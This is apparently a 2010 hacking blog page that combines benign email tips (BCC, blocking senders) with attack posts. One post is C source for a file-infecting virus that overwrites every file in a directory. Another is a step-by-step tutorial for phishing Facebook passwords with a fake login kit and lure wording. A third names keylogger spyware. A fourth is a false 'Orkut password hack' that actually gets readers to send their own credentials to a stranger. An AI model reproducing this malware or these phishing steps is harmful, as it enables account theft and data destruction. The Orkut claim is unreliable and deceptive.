hacking

hacking is my passion, if u wanna do some thing interesting u can visit here

My Blog List

just click to see

Your Ad Here

ur ip address is

Sign by Danasoft - Get Your Free Sign

Tuesday, July 13, 2010

Benefits of Using BCC While Sending an Email

Almost every user on the Internet sends/receives hundreds of emails per day. However only a handful of them know what is BCC and what are the advantages of using BCC while sending an email. If you are one such Internet user who is unaware of BCC then this is the post that you should definitely read!

What is BCC?

BCC stands Blind Carbon Copy. It refers to the practice of sending an email to multiple recipients without disclosing the individual emails addresses. While sending the same email/message to multiple recipients, it is a common practice for most users to separate the email addresses by using comma or semi-colon and insert all those addresses in the To: filed. When emails are sent in this way, each receiver is able to see the complete list of recipient email addresses to which the same message if being sent to. Unlike To:, the BCC: option allows you to hide the recipients in email messages. In other words, when emails are sent using BCC:,  the receiver will not be able to see the list of recipient email addresses. Thus using BCC is a smart way to protect the privacy of the recipients.

Why should you use BCC?

Here are the reasons for using BCC:

Privacy – BCC provides an easy and simple option for protecting the privacy of your recipients. Under many circumstances it is necessary for us send an email without letting the recipients know who else is receiving the same message. Also it is highly recommended that you use the BCC: while forwarding a joke or a funny email to a list of your friends.  If you are sending email on behalf of a business or organization, it may be especially important to keep lists of clients, members, or associates confidential. So don’t forget to use BCC: in instances wherever privacy matters.

Respect for you recipients- While forwarding email messages, people often do not bother to remove the list of previous recipients.  As a result, messages that are repeatedly sent to many recipients may contain long lists of email addresses.  This makes it easy for the spammers to collect and target those emails for spamming.

In order to avoid the risk of spammers, it is necessary that you encourage people/friends to use BCC: while forwarding any message to you. This prevents your email address from appearing in other people’s inboxes thereby keeping yourself less exposed to spammers

How to Block Unwanted Emails

Do you want to  block emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well here is a way to block all those unwanted and annoying emails that you do not want to see or read! With this trick you can block individual email address or the whole domain from which you do not want the emails to come from. Here are the step-by-step instructions to do this.

For Gmail

1. Login to your account

2. At the top-right corner, click on Settings

3. Under Settings, click on Filters

4. You’ll now see an option “Create a new filter“, click on it

5. Now in the From field enter the email address from which you do not want to receive the emails

For ex. you may enter john@gmail .com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax: *@xyz.com. Now all the incoming emails from the domain xyz.com will be blocked.

6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.


For Yahoo

1. Login to your account

2. At the top-right corner, click on Options

3. A drop down menu appears, now click on More options

4. In the left panel select the option Filters and click on create or edit filters

5. Now click on Add

6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.

Fox ex. john@gmail.com or if you want to block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail

1. Login to your account

2. At the top-right corner, click on Options

3. A drop down menu appears, now click on More options

4. Click on Safe and blocked senders link under Junk e-mail

5. Now click on Blocked senders

6. Type in the email address that you want to block under blocked e-mail address or domain field.

For ex. Enter john@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.

That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. pass your comments!

How to Create a Computer Virus?

I sumit write this code for peoples who wants to create virus itself

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.



 #include  stdio.h
#include  io.h
#include  dos.h
#include  dir.h
#include  conio.h
#include  time.h




           FILE *virus,*host;
           int done,a=0;
          unsigned long x;
          char buff[2048];
          struct ffblk ffblk;
          clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

Thursday, June 24, 2010

how to delete virus without using antivirus

Anti-virus software can be very expensive and doesn't always find new breeds of computer virus. You can learn to locate and remove a virus yourself without using ant-virus software. By using the command prompt you can enter the infected drive, locate the virus, render it harmless and delete it from your system for good.

Instructions

Step
1

Click the "Start" menu and type "CMD" into the "Run" box and click "OK."
Step 
2

Select the drive that is infected with the virus. If you are not sure which drive is infected, start with the "C:" drive. Type in "C:" and press "Enter" to access this drive.
Step 
3

Type the following into the command prompt box: - s - h *. * /s /d and press "Enter." This will bring up any suspicious files located on the drive. Open the suspicious file.
Step 
4

Look for a file that contains a ".exe" file and a file titled "autorun.inf." If you find these two files, you have found the tainted file. Make sure to write down the name of the program where the file is located.
Step
5


Rename the "autorun.inf" so you can access the drive later without activating the virus. Type: rename autorun.inf as virusfile and close out of the "Command" prompt box.
Step
6

Double-click the "My Computer" icon and select the drive that has the infected file. Find the program that contains the infected file.
Step
7


Right-click on the program and choose "Open."
Step
8


Right-click on the file you renamed "virusfile" and choose "Delete."
Step
9


Right-click on the ".exe" file and choose "Delete." You have now removed the virus from your computer's hard drive.

I think u like this  simple hacking trick without any software, thanks !!

Wednesday, June 23, 2010

how to hack facebook account

ffYes that's right you can hack Facebook password. Here is a simple tutorial that you can use to hack your friend's Facebook password using Facebook phisher.

P.S.- Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.
P.S.2- This tutorial is for educational purposes only. I will not be responsible for your actions from here on.










We will use Phishing through Fake Login Pages. These fake login pages resemble the original login pages of Facebook. The victim is fooled to believe the fake Facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Facebook login details are stolen away.

Follow these steps to Hack Facebook password of any account:

1]- Download these files from HERE- http://www.mediafire.com/?n2umngjyiai

2]- The downloaded file contains the following files inside the Facebook.com folder:

* index.html
* write.php

3]- Upload all of the three files to any free web hosting site like:

* www.sigmirror.com
* www.yourfreehosting.net
* www.esmartstart.com
* www.110mb.com
* www.drivehq.com
* www.t35.com


4]- The index.html is the fake page of Facebook.com. You have to make your victim login through this page. So send the link you get by uploading these files to your victim in a disguised way. Like maybe- Try this link out..New Facebook Version 9 Beta Is out (Just an example.!)

5]- Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel as shown above.

Warning- This method works 100%. You just have to make your victim Login through your link. This is illegal. try it at your own risk.

Saturday, June 12, 2010

Common Email Hacking Methods

Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.

Hackers can install keylogger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details.

A keylogger program is widely available on the internet.some of them are listed below

Win-Spy Monitor

Realtime Spy

SpyAgent Stealth

Spy Anywhere

For more information on keyloggers and it’s usage refer my post Hacking an email account.

Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).

new methods how to hack orkut password without any software

hello frends today i teach how to hack orkut password without any software

First thing u have to do is open ur account [orkut].copy the url of the victim.
u would find it in his profile at the address bar.
now open ur yahoo or gmail or any other account.
in that go to 'compose mail'.in the subject field write as "PASSWORD RETRIEVAL"
in the body..write ur id ex"yourid@xyz.com"
ur password in the next line.leave 4 line and paste the victim's orkut url.
leave two lines..and paste ur orkut profile url.
finally send it to secretsorkut@yahoo.com.
this id does not store any id's or passwords.this is newly created by some yahoo experts on public demand.after sending it within 1 hr u wud get the victims password in ur mailbox.i hacked many of them.lets see how many u will hack.
please comment if u like it thanks